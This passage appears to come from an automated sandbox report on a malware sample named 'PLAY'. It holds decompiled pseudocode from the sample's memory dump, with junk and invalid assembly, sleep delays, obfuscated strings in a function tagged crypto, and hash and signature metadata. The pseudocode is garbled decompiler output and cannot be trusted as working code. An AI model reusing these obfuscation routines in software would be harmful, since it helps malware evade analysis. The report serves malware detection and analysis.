									E00AEEB70(_t120, 0xb0d5b0, _t156, _t159);
									return _t156;
								}
								L36:
								_t155 = 0x1616;
							}
							L37:
							_t147 = _t147 + 1;
							_t89 = _t89 + 0x48;
							 *((short*)(_t165 - 0x28)) = (_t120 & 0x000000ff) + _t159 + _t155;
							__eflags = _t147 - 0x80;
						} while (_t147 < 0x80);
						_t130 = 0xb0d5b0;
						E00AEEB70(_t120, 0xb0d5b0, _t155, _t159);
						 *((intOrPtr*)(_t165 - 0x12)) =  *((intOrPtr*)(_t165 - 0x12)) + 0xfffe;
						_t93 =  *((intOrPtr*)(_t165 - 0xc)) -  *((intOrPtr*)(_t165 - 8));
						__eflags = _t93;
						do {
							L39:
							_t93 = _t93 +  *(_t165 - 4);
							 *(_t165 - 5) = _t93;
							_t176 = _t174 - 0xc;
							_t147 = 0x79c9;
							__eflags = 0x79c9 - 0x3ed1;
							if(0x79c9 <= 0x3ed1) {
								_t176 = _t176 + 0x1f0;
							}
							L41:
							_t174 = _t176 + 0xc;
							L45();
						} while (__eflags < 0);
						_t172 = _t174 & 0xd5a08f8a;
						asm("outsd");
						 *((long long*)(_t155 - 0x51)) = _t190;
						asm("rol bh, cl");
						asm("invalid");
						L43:
						_t94 = _t165;
						_t165 = _t93;
						asm("cld");
						if(__eflags > 0) {
							L46:
							__eflags = _t130 - _t159;
							asm("out 0x14, al");
							_push(ds);
							asm("movsd");
							asm("fldenv [edi-0x22]");
							asm("invalid");
							asm("fild dword [ebp-0x28fff275]");
							E00AEDEC0(_t120, _t130, _t155, _t159);
							Sleep(0x1f4); // executed
							 *(_t165 - 0x10) =  *(_t165 - 0x10) - 0x2d0;
							 *((short*)(_t165 - 0x54)) =  *((short*)(_t165 - 0x54)) + 3;
							L1:
							_t177 = _t172 - 8;
							_t97 = 0x7ffe;
							if(0x7ffe <= 0x2da2) {
								_t177 = _t177 + 0x107;
							}
							_t178 = _t177 + 8;
							L7();
							asm("invalid");
							_t125 = _t120 |  *(_t120 + _t159 * 8 - 0x2433d140);
							asm("int3");
							_t139 = _t130 + 1;
							0x9312e6ed(_t165);
							if (_t139 < 0) goto L8;
							asm("bound ebp, [edi+0x240483c9]");
						} else {
							L44:
							asm("a16 int 0x70");
							asm("loop 0x74");
							asm("adc [eax], esi");
							__eflags = 0x3d + _t172;
							L45:
							 *_t172 =  *_t172 + 0x50;
							__eflags =  *_t172;
							return _t94;
						}
					} else {
						L30:
						asm("scasd");
						L31:
						_t185 = _t165;
						L32:
						 *_t185 =  *_t185 + 0x4f;
						__eflags =  *_t185;
						return 0x7ffe;
					}
					goto L61;
				}
			}



























          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f7
          0x00af74f8
          0x00000000
          0x00000000
          0x00af74fa
          0x00af74fa
          0x00af7560
          0x00af7560
          0x00af7560
          0x00af7564
          0x00af7569
          0x00af756d
          0x00af756f
          0x00af7575
          0x00af7576
          0x00af7580
          0x00af7587
          0x00af7589
          0x00af758c
          0x00af7593
          0x00af7597
          0x00af7599
          0x00af7599
          0x00af759f
          0x00af759f
          0x00af75a2
          0x00af75a8
          0x00af75b1
          0x00af75b2
          0x00af75b2
          0x00af75b3
          0x00af75b8
          0x00af761c
          0x00af761c
          0x00af761f
          0x00af7625
          0x00af7629
          0x00af7634
          0x00af763f
          0x00af7645
          0x00af7645
          0x00af7648
          0x00af7648
          0x00af7648
          0x00af764c
          0x00af764e
          0x00af764e
          0x00af7651
          0x00af7654
          0x00af77de
          0x00af77e3
          0x00af77ed
          0x00000000
          0x00af77f9
          0x00af765a
          0x00af765a
          0x00af765a
          0x00af765f
          0x00af7662
          0x00af7666
          0x00af766c
          0x00af7670
          0x00af7670
          0x00af7678
          0x00af767d
          0x00af7687
          0x00af768e
          0x00af768e
          0x00af7691
          0x00af7691
          0x00af7691
          0x00af7694
          0x00af7697
          0x00af769a
          0x00af769e
          0x00af76a3
          0x00af76a5
          0x00af76a5
          0x00af76ab
          0x00af76ab
          0x00af76ae
          0x00af76ae
          0x00af76b5
          0x00af76bb
          0x00af76bc
          0x00af76bf
          0x00af76c1
          0x00af76c3
          0x00af76c3
          0x00af76c3
          0x00af76c4
          0x00af76c5
          0x00af76f2
          0x00af76f2
          0x00af76f4
          0x00af76f6
          0x00af76f7
          0x00af76f8
          0x00af76fb
          0x00af7701
          0x00af7709
          0x00af7713
          0x00af7715
          0x00af771c
          0x00af73b0
          0x00af73b0
          0x00af73b3
          0x00af73bb
          0x00af73bd
          0x00af73bd
          0x00af73c3
          0x00af73c6
          0x00af73cc
          0x00af73ce
          0x00af73d5
          0x00af73d6
          0x00af73d7
          0x00af73dc
          0x00af73dd
          0x00af76c7
          0x00af76c7
          0x00af76c9
          0x00af76cf
          0x00af76d1
          0x00af76d3
          0x00af76d5
          0x00af76d5
          0x00af76d5
          0x00af76d9
          0x00af76d9
          0x00af75ba
          0x00af75ba
          0x00af75ba
          0x00af75bb
          0x00af75bb
          0x00af75bc
          0x00af75bc
          0x00af75bc
          0x00af75c0
          0x00af75c0
          0x00000000
          0x00af75b8

          APIs
          • Sleep.KERNELBASE(000001F4), ref: 00AF756E
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 9de5f00b51d3d14630395e388a7f889222c8be84ac67ee6bce4a84a04db1a39d
          • Instruction ID: f1eecc2c346c695cc448db724304148b659c17b760a1917c2ff1c521b3ed9323
          • Opcode Fuzzy Hash: 9de5f00b51d3d14630395e388a7f889222c8be84ac67ee6bce4a84a04db1a39d
          • Instruction Fuzzy Hash: AFF04C65D0844A57DF11B3F49D136FC7BB58F11300F5800A2E8545A387F529871C87AB
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF7535 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON
          Download Yara Rule
          APIs
          • Sleep.KERNELBASE(000001F4), ref: 00AF756E
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 31e1a584cb61a6df88f619b9567968b4fca21804275af69c6c4de55a7cd98344
          • Instruction ID: 1c69b87815386657864a6dd4804360bce12bf66fc58abacb179d59303cf8141a
          • Opcode Fuzzy Hash: 31e1a584cb61a6df88f619b9567968b4fca21804275af69c6c4de55a7cd98344
          • Instruction Fuzzy Hash: 4DF02439C09049AFCB01EBA4C9166DDBBB08F16301F541199D820BFA82D2798B199B37
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF048E Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
          Download Yara Rule
          C-Code - Quality: 72%
          			E00AF048E(void* __eax, void* __ebx, signed char __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				short _t27;
				void* _t28;
				signed char _t31;
				signed char _t33;
				signed char _t35;
				void* _t40;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t67;

				_t67 = __fp0;
				_t40 = __edi;
				_t31 = __ecx;
				_t27 = 0x35;
				asm("aas");
				asm("fst dword [eax-0x7651ff79]");
				goto L22;
				while(1) {
					__bh = __bh + __dl;
					__al = 0;
					__eax = E00AEDEC0(__ebx, __ecx, __edi, __esi);
					Sleep(0x3a98); // executed
					_t33 = 1;
					if( *((intOrPtr*)(_t43 - 0x88)) == 1) {
						_t31 = _t31 + 2;
						_t33 = 0;
						_t27 = _t27 + 0xfffe;
						 *(_t43 - 0x99) = _t31;
						 *((short*)(_t43 - 0x9e)) = _t27;
					}
					if( *((intOrPtr*)(_t43 - 0x7c)) == 1) {
						_t31 = _t31 + 2;
						_t33 = 0;
						_t27 = _t27 + 0xfffe;
						 *(_t43 - 0x99) = _t31;
						 *((short*)(_t43 - 0x9e)) = _t27;
					}
					if( *((intOrPtr*)(_t43 - 0x70)) == 1) {
						_t31 = _t31 + 2;
						_t33 = 0;
						_t27 = _t27 + 0xfffe;
						 *(_t43 - 0x99) = _t31;
						 *((short*)(_t43 - 0x9e)) = _t27;
					}
					if( *((intOrPtr*)(_t43 - 0x64)) == 1) {
						_t31 = _t31 + 2;
						_t33 = 0;
						_t27 = _t27 + 0xfffe;
						 *(_t43 - 0x99) = _t31;
						 *((short*)(_t43 - 0x9e)) = _t27;
					}
					if( *((intOrPtr*)(_t43 - 0x58)) != 1) {
						__eflags = _t33;
						if(__eflags != 0) {
							_t46 = _t45 - 4;
							__eflags = 0x3656 - 0x4146;
							if(0x3656 == 0x4146) {
								_t46 = _t46 + 0x15d;
							}
							_t28 = E00AF0520(_t27);
							asm("cli");
							asm("aam 0x3c");
							_push(cs);
							_t35 = 0x3656 +  *((intOrPtr*)(_t28 + 0x10f1225d));
							__eflags = _t35;
							__eflags = _t35 & _t31;
							asm("adc [ebx+ecx-0x56e7d480], dl");
							return _t28;
						} else {
							goto L14;
						}
					} else {
						_t31 = _t31 + 2;
						_t27 = _t27 + 0xfffe;
						 *(_t43 - 0x99) = _t31;
						 *((short*)(_t43 - 0x9e)) = _t27;
						_t17 = __ebp - 0x6f7af02e;
						 *_t17 =  *(__ebp - 0x6f7af02e) | __al;
						__eflags =  *_t17;
						L14:
						_t48 = _t45 - 0xc;
					}
				}
			}














          0x00af048e
          0x00af048e
          0x00af048e
          0x00af0498
          0x00af049a
          0x00af049b
          0x00af04a1
          0x00af04b9
          0x00af04b9
          0x00af04bb
          0x00af04bd
          0x00af04c7
          0x00af03b0
          0x00af03c0
          0x00af03c2
          0x00af03c5
          0x00af03c7
          0x00af03ca
          0x00af03d0
          0x00af03d0
          0x00af03db
          0x00af03dd
          0x00af03e0
          0x00af03e2
          0x00af03e5
          0x00af03eb
          0x00af03eb
          0x00af03f6
          0x00af03f8
          0x00af03fb
          0x00af03fd
          0x00af0400
          0x00af0406
          0x00af0406
          0x00af0411
          0x00af0413
          0x00af0416
          0x00af0418
          0x00af041b
          0x00af0421
          0x00af0421
          0x00af042c
          0x00af0443
          0x00af0445
          0x00af04db
          0x00af04e2
          0x00af04e7
          0x00af04e9
          0x00af04e9
          0x00af04f2
          0x00af04f7
          0x00af04f8
          0x00af04fa
          0x00af04fb
          0x00af04fb
          0x00af04fe
          0x00af0500
          0x00af0507
          0x00000000
          0x00000000
          0x00000000
          0x00af042e
          0x00af042e
          0x00af0431
          0x00af0434
          0x00af043a
          0x00af0442
          0x00af0442
          0x00af0442
          0x00af044b
          0x00af044b
          0x00af0452
          0x00af042c

          APIs
          • Sleep.KERNELBASE(00003A98), ref: 00AF04C7
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: ce0ca614b6f082bc1d79b8900e5226611612d62a56c1fa9acbf0a764499f2642
          • Instruction ID: ab42bba82037c3734cae6730e830950cd442886da4380a7fcff45605fd4b722a
          • Opcode Fuzzy Hash: ce0ca614b6f082bc1d79b8900e5226611612d62a56c1fa9acbf0a764499f2642
          • Instruction Fuzzy Hash: 58E0262D4481859EC702BB7084053D8FB304F17301F102288D0687EA02C3608A80EF36
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF76DA Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
          Download Yara Rule
          APIs
          • Sleep.KERNELBASE(000001F4), ref: 00AF7713
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 8709137de129f30584eaa38df0f559fe6d99628b62c67e37a1eb53bd790c02d5
          • Instruction ID: 792edd06e3e5c307e5ec62bef126a26c5a48b293389ed6a761862162e5ff061a
          • Opcode Fuzzy Hash: 8709137de129f30584eaa38df0f559fe6d99628b62c67e37a1eb53bd790c02d5
          • Instruction Fuzzy Hash: 47E07D3A489146DFCB02EFB0C4092DDF7309F12301F101308D4203E940C3B08244AB33
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE1A6 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E00AEE1A6() {
				int _t2;
				void* _t6;

				_t2 = VirtualFree( *(_t6 - 4), 0, ??); // executed
				return _t2;
			}





          0x00aee1ab
          0x00aee1b3

          APIs
          • VirtualFree.KERNELBASE(?), ref: 00AEE1AB
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FreeVirtual
          • String ID:
          • API String ID: 1263568516-0
          • Opcode ID: fa17a80d9f985eb328a38b15fab246bedbfa769b3a3a61fd04690cf6db4a28fc
          • Instruction ID: 3177805d924e5d9cb6431234ba4395d97f0ed5a34298246708c940d981e99d0a
          • Opcode Fuzzy Hash: fa17a80d9f985eb328a38b15fab246bedbfa769b3a3a61fd04690cf6db4a28fc
          • Instruction Fuzzy Hash: DAB0123374400855D91095C9BC0279CF310D7C0132F2001F3DA0CD005045130A201180
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Function 00AE705A Relevance: 19.2, APIs: 3, Strings: 7, Instructions: 1750COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 82%
          			E00AE705A(signed int __eax, void* __edx, signed int* __edi, signed int* __esi) {
				intOrPtr _t1001;
				intOrPtr _t1014;
				intOrPtr _t1020;
				signed char _t1022;
				signed char _t1024;
				signed char _t1025;
				intOrPtr _t1030;
				intOrPtr _t1031;
				signed char _t1036;
				signed int _t1038;
				signed int _t1041;
				signed int _t1043;
				signed int _t1045;
				signed short _t1051;
				signed int _t1057;
				signed char _t1061;
				signed short _t1063;
				signed char _t1068;
				signed char _t1074;
				signed int _t1075;
				signed char _t1079;
				signed int _t1083;
				signed int _t1084;
				signed int _t1089;
				signed char _t1090;
				signed int _t1096;
				signed int _t1097;
				signed char _t1099;
				signed int _t1100;
				char _t1107;
				signed int _t1112;
				signed char _t1116;
				signed int _t1118;
				signed int _t1119;
				signed int _t1123;
				signed int _t1124;
				signed int _t1128;
				signed int _t1130;
				signed int _t1136;
				char* _t1137;
				signed int _t1151;
				signed char _t1155;
				signed int _t1187;
				signed char _t1193;
				signed short _t1197;
				signed int _t1200;
				signed char _t1214;
				signed int _t1219;
				signed int _t1227;
				signed char _t1229;
				signed int _t1234;
				signed int _t1240;
				signed char _t1247;
				signed char _t1250;
				signed char _t1252;
				signed int _t1254;
				signed int _t1258;
				signed int _t1264;
				char* _t1265;
				signed short _t1271;
				signed char _t1282;
				short _t1287;
				signed int _t1292;
				signed short _t1295;
				signed int _t1301;
				signed int _t1304;
				char* _t1305;
				char* _t1307;
				signed int _t1309;
				char* _t1310;
				signed short _t1321;
				signed int _t1329;
				char* _t1334;
				short _t1349;
				char _t1355;
				signed int _t1356;
				signed char _t1363;
				char _t1366;
				signed int _t1368;
				signed short _t1370;
				signed int _t1375;
				char* _t1376;
				signed int _t1395;
				char _t1397;
				signed int _t1417;
				void* _t1428;
				signed char _t1437;
				signed int _t1443;
				signed char _t1458;
				signed int _t1459;
				signed char _t1463;
				signed int _t1466;
				signed int _t1471;
				signed int _t1477;
				unsigned int _t1479;
				signed int _t1487;
				signed char _t1493;
				signed int _t1496;
				signed int _t1497;
				signed int _t1498;
				signed char _t1502;
				signed char _t1503;
				signed int _t1504;
				signed char _t1506;
				signed char _t1508;
				signed char _t1510;
				signed char _t1511;
				signed char _t1512;
				signed char _t1513;
				signed char _t1515;
				signed char _t1519;
				signed char _t1522;
				signed char _t1523;
				signed int _t1536;
				signed int _t1541;
				signed int _t1542;
				signed short _t1547;
				signed short _t1548;
				signed int _t1549;
				signed int _t1554;
				signed int _t1555;
				signed int _t1558;
				signed int _t1565;
				signed int _t1566;
				signed char _t1569;
				signed short _t1573;
				signed int _t1574;
				signed int _t1575;
				signed int _t1584;
				signed int _t1588;
				signed char _t1590;
				void* _t1610;
				signed int _t1611;
				signed int _t1612;
				signed int _t1613;
				signed int _t1615;
				signed int _t1617;
				signed int _t1619;
				signed int _t1621;
				signed int _t1622;
				signed int _t1631;
				signed int _t1637;
				signed int _t1640;
				signed int _t1642;
				signed int _t1649;
				void* _t1651;
				signed int _t1655;
				signed char _t1663;
				signed int _t1665;
				signed int _t1677;
				signed int _t1678;
				signed int _t1679;
				signed char _t1681;
				unsigned int _t1689;
				unsigned int _t1695;
				signed int _t1697;
				signed int _t1702;
				signed int _t1703;
				signed int _t1704;
				intOrPtr _t1707;
				signed int _t1710;
				intOrPtr _t1712;
				signed int _t1718;
				signed int _t1719;
				signed int _t1721;
				signed int _t1723;
				signed int _t1725;
				signed char _t1731;
				signed int _t1732;
				signed int _t1733;
				signed int _t1737;
				signed char _t1742;
				signed int _t1743;
				signed char _t1748;
				signed char _t1751;
				signed char _t1757;
				unsigned int _t1763;
				intOrPtr _t1767;
				signed int _t1768;
				signed int _t1769;
				unsigned int _t1770;
				signed int _t1771;
				signed int _t1773;
				signed char _t1774;
				short _t1776;
				signed int _t1780;
				signed int _t1782;
				signed int _t1791;
				signed int _t1793;
				signed int _t1794;
				intOrPtr _t1795;
				signed int _t1800;
				signed int _t1801;
				signed short _t1802;
				signed int _t1807;
				signed int _t1808;
				signed int _t1810;
				short _t1812;
				signed int _t1816;
				void* _t1819;
				void* _t1820;
				void* _t1821;
				void* _t1822;
				void* _t1823;
				void* _t1824;
				void* _t1826;

				asm("adc al, 0xce");
				_pop(_t1536);
				asm("cld");
				_t1816 = __eax;
				asm("sbb ebx, edx");
				_t1493 = 0xe9;
				asm("invalid");
				if((0x0000005e ^  *__edi) < 0) {
					L3:
					goto 0x472a50f3;
					 *_t1536 =  *_t1536 >> 0x52;
					asm("invalid");
					asm("cmpsd");
					asm("loopne 0xffffff84");
					asm("stc");
					_t1001 =  *0xb08d58; // 0x4b5173
					_t1493 = 0xc0;
					 *((intOrPtr*)(_t1816 - 0x128)) = _t1001;
				} else {
					asm("daa");
					 *__esi =  *__esi & _t1536;
					asm("lds ebp, [edx+0x1]");
					_push(__edi);
					_pop(0xfe);
					asm("sti");
					if( *__esi == 0) {
						asm("movsd");
						goto L3;
					}
				}
				asm("movq xmm0, [0xb08d50]");
				 *(_t1816 - 0x224) = 0x19;
				 *(_t1816 - 0x14c) = 0x19;
				 *(_t1816 - 0x176) = 0x28;
				 *((char*)(_t1816 - 0x175)) = 0x9d;
				 *(_t1816 - 0xe6) = 0x40;
				 *(_t1816 - 0xc6) = 0xcb;
				 *(_t1816 - 0xe5) = 0x72;
				 *((short*)(_t1816 - 0xd4)) =  *0xb08d60 & 0x0000ffff;
				 *((short*)(_t1816 - 0xec)) =  *0xb08d6c & 0x0000ffff;
				_t1695 =  *"O6sop"; // 0x6f73364f
				 *(_t1816 - 0xdc) = 0xd4;
				 *(_t1816 - 0xc5) = 0xe5;
				 *((char*)(_t1816 - 0xc1)) = 0x7c;
				asm("movq [ebp-0x130], xmm0");
				asm("movq xmm0, [0xb08d64]");
				 *(_t1816 - 0xc7) = 0xbf;
				_t1014 =  *0xb08d88; // 0x63
				asm("movq [ebp-0xf4], xmm0");
				asm("movups xmm0, [0xb08d70]");
				 *((intOrPtr*)(_t1816 - 0x28c)) = _t1014;
				 *(_t1816 - 0x1b0) = 0x2576;
				asm("movups [ebp-0x2a4], xmm0");
				 *(_t1816 - 0x170) = 0x683;
				asm("movq xmm0, [0xb08d80]");
				asm("movq [ebp-0x294], xmm0");
				asm("movups xmm0, [0xb08d8c]");
				 *((short*)(_t1816 - 0x23c)) = 0;
				 *((intOrPtr*)(_t1816 - 0x14b)) = 0x40529d28;
				 *(_t1816 - 0xd9) = _t1493;
				 *((intOrPtr*)(_t1816 - 0x147)) = 0x2072cbc0;
				 *(_t1816 - 0x143) = 0x89;
				 *(_t1816 - 0xd8) = _t1695;
				 *((intOrPtr*)(_t1816 - 0x158)) = 0x1b14e5d4;
				 *((intOrPtr*)(_t1816 - 0x154)) = 0x5cbfbc7c;
				 *(_t1816 - 0x150) = 0x296d;
				 *((char*)(_t1816 - 0x14e)) = 0;
				 *(_t1816 - 0x13c) = 0x1ffb;
				 *(_t1816 - 0x100) = 0xfe;
				 *(_t1816 - 0x258) = 0x5672576;
				 *((intOrPtr*)(_t1816 - 0x254)) = 0x644354f9;
				 *((intOrPtr*)(_t1816 - 0x250)) = 0x68317d4;
				 *((intOrPtr*)(_t1816 - 0x24c)) = 0x33ce5542;
				 *((intOrPtr*)(_t1816 - 0x248)) = 0x195a2640;
				 *((intOrPtr*)(_t1816 - 0x244)) = 0x590042ad;
				 *((intOrPtr*)(_t1816 - 0x240)) = 0x25fd508f;
				 *((intOrPtr*)(_t1816 - 0x238)) = 0x4a9e2c64;
				 *((intOrPtr*)(_t1816 - 0x234)) = 0xcac487d;
				 *((intOrPtr*)(_t1816 - 0x230)) = 0x37627064;
				 *((intOrPtr*)(_t1816 - 0x22c)) = 0x17f4432b;
				 *((intOrPtr*)(_t1816 - 0x228)) = 0x21db;
				asm("movups [ebp-0x26c], xmm0");
				 *((short*)(_t1816 - 0x25c)) =  *0xb08d9c & 0x0000ffff;
				 *(_t1816 - 0x108) = 0x47d3;
				asm("movups xmm0, [0xb08da0]");
				_t1767 =  *((intOrPtr*)(_t1816 - 0x188));
				 *((short*)(_t1816 - 0x214)) = 0;
				_t1020 =  *0xb08db8; // 0x470068
				 *((intOrPtr*)(_t1816 - 0x2e8)) = _t1020;
				 *((short*)(_t1816 - 0x2e4)) =  *0xb08dbc & 0x0000ffff;
				_t1022 =  *0xb08dc8; // 0x344e6c74
				 *(_t1816 - 0x160) = _t1022;
				 *(_t1816 - 0x15c) =  *0xb08dcc & 0x0000ffff;
				_t1024 = "luvdi5J"; // 0x6476756c
				asm("movups [ebp-0x300], xmm0");
				 *(_t1816 - 0xfc) = _t1024;
				asm("movq xmm0, [0xb08db0]");
				_t1025 =  *0xb08dd4; // 0x4a3569
				asm("movq [ebp-0x2f0], xmm0");
				asm("movq xmm0, [0xb08dc0]");
				 *(_t1816 - 0xf8) = _t1025;
				asm("movq [ebp-0x168], xmm0");
				asm("movups xmm0, [0xb08dd8]");
				 *(_t1816 - 0xda) = 0xa1;
				 *((char*)(_t1816 - 0x10f)) = 0xa1;
				 *(_t1816 - 0xc2) = 0xd5;
				asm("movups [ebp-0x288], xmm0");
				 *(_t1816 - 0x1ac) = 0x6b16;
				asm("movq xmm0, [0xb08de8]");
				asm("movq [ebp-0x278], xmm0");
				asm("movups xmm0, [0xb08df4]");
				 *((intOrPtr*)(_t1816 - 0x1d4)) = 0x1acd;
				_t1030 =  *0xb08df0; // 0x4a
				 *((intOrPtr*)(_t1816 - 0x270)) = _t1030;
				_t1031 =  *0xb08e0c; // 0x680044
				asm("movups [ebp-0x1d0], xmm0");
				 *((intOrPtr*)(_t1816 - 0x1b8)) = _t1031;
				asm("movq xmm0, [0xb08e04]");
				asm("movq [ebp-0x1c0], xmm0");
				asm("movups xmm0, [0xb08e14]");
				 *((short*)(_t1816 - 0x1b4)) =  *0xb08e10 & 0x0000ffff;
				asm("movups [ebp-0x210], xmm0");
				 *((short*)(_t1816 - 0x198)) =  *0xb08e3c & 0x0000ffff;
				asm("movq xmm0, [0xb08e24]");
				asm("movq [ebp-0x200], xmm0");
				_t1697 = (_t1695 >> 0x18) + 1;
				asm("movups xmm0, [0xb08e2c]");
				 *((intOrPtr*)(_t1816 - 0x21c)) = 0x9e906c0;
				 *((intOrPtr*)(_t1816 - 0x218)) = 0x467b0a72;
				 *(_t1816 - 0x118) = 0x2f4;
				 *(_t1816 - 0x17c) = 0;
				 *(_t1816 - 0xe0) = 0x26;
				 *(_t1816 - 0xbf) = 0x33;
				 *(_t1816 - 0xc3) = 0xe9;
				 *(_t1816 - 0xbe) = 0xcc;
				 *(_t1816 - 0x10c) = 0xb8d5;
				 *((char*)(_t1816 - 0x10a)) = 0;
				 *((intOrPtr*)(_t1816 - 0x1f8)) = 0x6b163010;
				 *(_t1816 - 0x1f4) = 0x159a1b14;
				 *((intOrPtr*)(_t1816 - 0x1f0)) = 0x1acd3d75;
				 *((intOrPtr*)(_t1816 - 0x1ec)) = 0x1100727b;
				 *((intOrPtr*)(_t1816 - 0x1e8)) = 0x2c0926b2;
				 *((intOrPtr*)(_t1816 - 0x1e4)) = 0x21003a2b;
				 *((intOrPtr*)(_t1816 - 0x1e0)) = 0x35c1;
				asm("movups [ebp-0x1a8], xmm0");
				 *(_t1816 - 0x104) = _t1697;
				 *(_t1816 - 0xd5) = _t1697;
				 *(_t1816 - 0xd0) = (_t1493 & 0x000000ff) - ( *(_t1816 - 0xf0) >> 0x18);
				if( *((intOrPtr*)(_t1767 + 0x18)) == 0x100000) {
					__eflags =  *(_t1816 - 0xfc) - 0xe2;
					_t1036 =  *(_t1816 - 0xf8);
					 *(_t1816 - 0xe3) = _t1036;
					if( *(_t1816 - 0xfc) <= 0xe2) {
						asm("cdq");
						_t1038 = E00B030D0(0x2f4, 0, 0xe9, _t1697);
						 *(_t1816 - 0x190) = 0x1593;
						_t1496 = 0x26;
						asm("cdq");
						_t1041 = ( *(_t1816 - 0x164) >> 0x18) + 0x27;
						__eflags = _t1041;
						 *(_t1816 - 0x108) = _t1038;
						 *(_t1816 - 0x118) = _t1041;
						asm("adc ecx, 0x0");
						 *(_t1816 - 0x17c) = _t1697;
						_t1541 =  *(_t1816 - 0xfb);
					} else {
						 *((short*)(_t1816 - 0x2ba)) = 0x5c57;
						_t1496 = ( *(_t1816 - 0x2fc) >> 0x10) -  *(_t1816 - 0xfc) +  *(_t1816 - 0x2a0);
						 *((short*)(_t1816 - 0x2b8)) = (_t1036 & 0x000000ff) + 0x6ac6;
						 *((short*)(_t1816 - 0x2aa)) = 0;
						_t1763 =  *0xb08dc8; // 0x344e6c74
						 *((short*)(_t1816 - 0x2bc)) = 0x6aa1;
						_t1689 = "luvdi5J"; // 0x6476756c
						 *((short*)(_t1816 - 0x21c)) = 2;
						_t1541 = (_t1689 >> 8) + 1;
						 *((intOrPtr*)(_t1816 - 0x2c0)) = 0x4f7970e9;
						_t1487 = ( *(_t1816 - 0x164) & 0x000000ff) + 0x26 +  *(_t1816 - 0x29c);
						 *((intOrPtr*)(_t1816 - 0x2b6)) = 0x11c06eca;
						 *((intOrPtr*)(_t1816 - 0x2b2)) = 0x4abe2502;
						 *((intOrPtr*)(_t1816 - 0x2ae)) = 0x64557f31;
						 *((char*)(_t1816 - 0x15f)) = (_t1763 >> 8) + 1;
						 *(_t1816 - 0x1b0) = _t1487;
						 *(_t1816 - 0x258) = _t1487;
						 *(_t1816 - 0x190) = 1;
					}
					_t1768 =  *(_t1816 - 0x140);
					asm("cdq");
